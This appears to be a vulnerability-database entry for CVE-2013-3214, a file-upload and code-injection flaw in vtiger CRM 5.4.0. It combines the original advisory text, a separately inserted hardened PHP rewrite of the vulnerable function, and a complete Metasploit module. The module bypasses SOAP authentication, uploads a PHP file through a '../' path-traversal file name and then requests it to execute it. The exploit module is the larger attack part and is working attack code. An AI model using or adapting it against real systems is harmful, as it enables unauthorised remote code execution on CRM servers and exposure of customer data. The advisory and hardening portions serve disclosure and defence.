var-202001-0886
Vulnerability from variot
vtiger CRM 5.4.0 and earlier contain a PHP code injection vulnerability in 'vtigerolservice.php'. vtiger CRM contains an injection vulnerability. Information may be obtained or tampered with, and a denial-of-service (DoS) condition may result.
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management (CRM) system based on SugarCRM, developed by the American company Vtiger. It provides functions such as managing, collecting, and analyzing customer information.
[-] Vulnerability Description:
The vulnerable code is located in the AddEmailAttachment SOAP method defined in /soap/vtigerolservice.php:
458.    function AddEmailAttachment($emailid,$filedata,$filename,$filesize,$filetype,$username,$session)
459.    {
460.        if(!validateSession($username,$session))
461.        return null;
462.        global $adb;
463.        require_once('modules/Users/Users.php');
464.        require_once('include/utils/utils.php');
465.        $filename = preg_replace('/\s+/', '_', $filename);//replace space with _ in filename
466.        $date_var = date('Y-m-d H:i:s');
467.
468.        $seed_user = new Users();
469.        $user_id = $seed_user->retrieve_user_id($username);
470.
471.        $crmid = $adb->getUniqueID("vtiger_crmentity");
472.
473.        $upload_file_path = decideFilePath();
474.
475.        $handle = fopen($upload_file_path.$crmid."_".$filename,"wb");
476.        fwrite($handle,base64_decode($filedata),$filesize);
477.        fclose($handle);
The vulnerability exists because this method fails to properly validate input passed through the "filedata" and "filename" parameters, which are used to write an "email attachment" in the storage directory (lines 475-477).
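A hardened form of the write at lines 475-477, as an added example that is not vtiger's code or the vendor's patch: it accepts only a single stem plus an allow-listed extension as the file name, decodes "filedata" strictly, and ignores the client-supplied "filesize". The function names, the extension allow-list, the size cap and the $storageDir parameter (standing in for decideFilePath()) are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not vtiger code. The allow-list, the size cap and both
// function names are assumptions chosen for illustration.
const ATTACHMENT_EXTENSIONS = ['pdf', 'txt', 'csv', 'png', 'jpg', 'jpeg', 'gif'];
const ATTACHMENT_MAX_BYTES  = 10 * 1024 * 1024;

/** Return a storage-safe file name, or throw if the name is not acceptable. */
function safeAttachmentName(string $filename): string
{
    // Same whitespace normalisation as the original method (line 465).
    $name = preg_replace('/\s+/', '_', $filename);

    // Exactly one stem, one dot, one extension. This excludes '/', '\', NUL
    // bytes, '..' sequences and double extensions such as "report.php.jpg".
    if (!is_string($name)
        || !preg_match('/^[A-Za-z0-9_-]{1,100}\.([A-Za-z0-9]{1,5})$/D', $name, $m)) {
        throw new InvalidArgumentException('file name rejected');
    }
    if (!in_array(strtolower($m[1]), ATTACHMENT_EXTENSIONS, true)) {
        throw new InvalidArgumentException('extension not allowed');
    }
    return $name;
}

/** Decode and store one attachment inside $storageDir; returns the final path. */
function storeEmailAttachment(string $storageDir, int $crmid, string $filename, string $filedata): string
{
    $name = safeAttachmentName($filename);

    // Strict mode fails on characters outside the base64 alphabet.
    $bytes = base64_decode($filedata, true);
    if ($bytes === false || $bytes === '') {
        throw new InvalidArgumentException('filedata is not valid base64');
    }
    if (strlen($bytes) > ATTACHMENT_MAX_BYTES) {
        throw new InvalidArgumentException('attachment too large');
    }

    $base = realpath($storageDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException('storage directory missing');
    }

    // Defence in depth: the validated name has no separators, so the parent
    // of the target must be the storage directory itself.
    $target = $base . DIRECTORY_SEPARATOR . $crmid . '_' . $name;
    if (dirname($target) !== $base) {
        throw new InvalidArgumentException('target escapes storage directory');
    }

    // 'x' creates the file exclusively and fails if the path already exists.
    $handle = fopen($target, 'xb');
    if ($handle === false) {
        throw new RuntimeException('cannot create attachment file');
    }
    try {
        // Write the decoded length, never a length supplied by the client.
        if (fwrite($handle, $bytes) !== strlen($bytes)) {
            throw new RuntimeException('short write');
        }
    } finally {
        fclose($handle);
    }
    chmod($target, 0640);
    return $target;
}

// Demo on constructed input: one legitimate name and four that must be refused.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'attach_demo_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
$data  = base64_encode("constructed sample attachment body\n");
$names = ['invoice 2013.pdf', '../../../../../../x.php', 'notes.php',
          'report.php.jpg', "photo.jpg\0.php"];

foreach ($names as $i => $n) {
    try {
        $path = storeEmailAttachment($dir, 1000 + $i, $n, $data);
        echo 'stored   ', basename($path), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected ', json_encode($n, JSON_UNESCAPED_SLASHES), ': ', $e->getMessage(), PHP_EOL;
    }
}
```

Name validation alone does not replace server configuration: the storage directory should also sit outside the web root or be served with script execution disabled.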
[-] Solution:
The patch provided by the vendor (http://www.vtiger.com/blogs/?p=1467) doesn't completely fix this vulnerability, because a remote authenticated user is still able to inject and execute arbitrary code.
[*] The vendor was alerted about this when the feedback was provided.
[-] Disclosure Timeline:
[13/01/2013] - Vendor notified
[06/02/2013] - Vendor asked feedback about http://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848
[05/03/2013] - Feedback provided to the vendor [*]
[26/03/2013] - Vendor patch released
[18/04/2013] - CVE number requested
[20/04/2013] - CVE number assigned
[01/08/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3214 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-07
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rexml/document'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include REXML
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload',
      'Description' => %q{
        vTiger CRM allows an user to bypass authentication when requesting SOAP services.
        In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP
        service. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu
        10.04 and Windows 2003 SP2.
      },
      'Author'      =>
        [
          'Egidio Romano', # Vulnerability discovery
          'juan vazquez'   # msf module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2013-3214' ],
          [ 'CVE', '2013-3215' ],
          [ 'OSVDB', '95902' ],
          [ 'OSVDB', '95903' ],
          [ 'BID', '61558' ],
          [ 'BID', '61559' ],
          [ 'EDB', '27279' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ]
        ],
      'Privileged'  => false,
      'Platform'    => ['php'],
      'Arch'        => ARCH_PHP,
      'Payload'     =>
        {
          # Arbitrary big number. The payload is sent base64 encoded
          # into a POST SOAP request
          'Space'       => 262144, # 256k
          'DisableNops' => true
        },
      'Targets'     =>
        [
          [ 'vTigerCRM v5.4.0', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2013'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/'])
      ], self.class)
  end

  def check
    test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4)))
    res = send_soap_request(test_one)

    unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/
      return Exploit::CheckCode::Unknown
    end

    test_two = check_email_soap("admin")
    res = send_soap_request(test_two)

    if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/)
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    file_name = rand_text_alpha(rand(10)+6) + '.php'
    php = %Q||

    soap = add_attachment_soap(file_name, php)
    res = send_soap_request(soap)

    print_status("#{peer} - Uploading payload...")
    if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/
      print_good("#{peer} - Upload successfully uploaded")
      register_files_for_cleanup(file_name)
    else
      fail_with(Failure::Unknown, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload...")
    send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
  end

  def add_attachment_soap(file_name, file_data)
    xml = Document.new
    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:crm'     => "http://www.vtiger.com/products/crm"
      })
    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")
    body = xml.root.elements[2]
    body.add_element(
      "crm:AddEmailAttachment",
      {
        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
      })
    crm = body.elements[1]
    crm.add_element("emailid", {'xsi:type' => 'xsd:string'})
    crm.add_element("filedata", {'xsi:type' => 'xsd:string'})
    crm.add_element("filename", {'xsi:type' => 'xsd:string'})
    crm.add_element("filesize", {'xsi:type' => 'xsd:string'})
    crm.add_element("filetype", {'xsi:type' => 'xsd:string'})
    crm.add_element("username", {'xsi:type' => 'xsd:string'})
    crm.add_element("session", {'xsi:type' => 'xsd:string'})
    crm.elements['emailid'].text = rand_text_alpha(4+rand(4))
    crm.elements['filedata'].text = "MSF_PAYLOAD"
    crm.elements['filename'].text = "MSF_FILENAME"
    crm.elements['filesize'].text = file_data.length.to_s
    crm.elements['filetype'].text = "php"
    crm.elements['username'].text = rand_text_alpha(4+rand(4))

    xml_string = xml.to_s
    xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))
    xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}")

    return xml_string
  end

  def check_email_soap(user_name = "", session = "")
    xml = Document.new
    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:crm'     => "http://www.vtiger.com/products/crm"
      })
    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")
    body = xml.root.elements[2]
    body.add_element(
      "crm:CheckEmailPermission",
      {
        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
      })
    crm = body.elements[1]
    crm.add_element("username", {'xsi:type' => 'xsd:string'})
    crm.add_element("session", {'xsi:type' => 'xsd:string'})
    crm.elements['username'].text = user_name
    crm.elements['session'].text = session

    xml.to_s
  end

  def send_soap_request(soap_data)
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'),
      'method' => 'POST',
      'ctype'  => 'text/xml; charset=UTF-8',
      'data'   => soap_data
    })

    return res
  end

end